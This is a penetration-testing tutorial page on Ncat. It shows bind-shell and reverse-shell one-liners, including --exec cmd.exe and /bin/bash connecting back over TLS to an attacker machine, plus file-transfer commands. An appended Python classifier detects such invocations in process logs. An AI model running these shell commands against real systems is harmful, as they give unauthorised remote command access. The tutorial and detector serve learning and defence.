Ncat

Ncat is similar to netcat, but provides some options that netcat doesn't contain. It belongs to the Nmap project.

To create a bind shell, on a Windows victim we need to execute (-l for listening, -v for verbose output, -p to specify the port, -n to skip DNS resolution): ncat --exec cmd.exe -lvp 4444

And on the client machine (Kali) we could connect with telnet, for an unencrypted connection: telnet 192.168.1.100 4444

Just like in netcat, files can be transferred. To upload a file to a server, we need to execute in the server: ncat -lvp 4444 > receive.txt

And on the client: ncat 192.168.1.100 4444 < a.txt

With ncat we can establish encrypted connections with the --ssl option. For example, for a bind shell we execute on the target (192.168.1.100), using --allow so that only the client's address may connect: ncat --exec /bin/bash --allow 192.168.1.101 -vnl 4444 --ssl

And the client (192.168.1.101): ncat -v 192.168.1.100 4444 --ssl

Reverse shells are also possible. On the target (192.168.1.100), ncat connects out to our machine instead of listening, so -l is dropped: ncat --exec /bin/bash -vn --ssl 192.168.1.101 4444

While we listen on our attacking machine (192.168.1.101): ncat -lvp 4444 --ssl
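
From the defender's side, --ssl hides the session contents from network inspection, so the process command line is the more dependable place to spot these invocations. The following is an added example, not part of the original page: it classifies ncat command lines that attach a program to the socket. The names classify and SAMPLES are introduced here, and the sample lines are constructed from the commands above.

```python
import shlex

EXEC_LONG = {"--exec", "--sh-exec", "--lua-exec"}   # Ncat options that run a program
EXEC_SHORT = {"e", "c"}                             # short forms of --exec / --sh-exec
VALUE_SHORT = set("pswidmgGox")                     # other short options that take a value

def classify(cmdline):
    """Return a finding for an ncat command line that attaches a program, else None."""
    # posix=False keeps Windows backslashes; strip the quotes it leaves on tokens.
    argv = [a.strip("\"'") for a in shlex.split(cmdline, posix=False)]
    name = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower() if argv else ""
    if name not in ("ncat", "ncat.exe"):
        return None
    program, listening, tls = None, False, False
    for i, arg in enumerate(argv[1:], start=1):
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if arg.startswith("--"):
            opt, _, val = arg.partition("=")
            if opt in EXEC_LONG:
                program = val or nxt
            elif opt == "--listen":
                listening = True
            elif opt == "--ssl":
                tls = True
        elif arg.startswith("-"):
            # Bundled short flags such as -lvp or -vnl: walk them one by one.
            for pos, flag in enumerate(arg[1:], start=1):
                if flag == "l":
                    listening = True
                elif flag in EXEC_SHORT:
                    program = arg[pos + 1:] or nxt
                    break
                elif flag in VALUE_SHORT:
                    break  # rest of the bundle is that option's value
    if program is None:
        return None  # plain listener or client, e.g. a file transfer
    # Terms as used on this page: listening with a program = bind shell.
    return {"mode": "bind" if listening else "reverse", "program": program, "tls": tls}

# Constructed sample: command lines as a process-creation log would record them.
SAMPLES = [
    "ncat --exec cmd.exe -lvp 4444",
    "ncat --exec /bin/bash --allow 192.168.1.101 -vnl 4444 --ssl",
    "ncat --exec /bin/bash -vn --ssl 192.168.1.101 4444",
    "ncat -lvp 4444 --ssl",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line)
```

The last sample is a plain listener and is deliberately not flagged; only invocations that hand the socket to a program are reported.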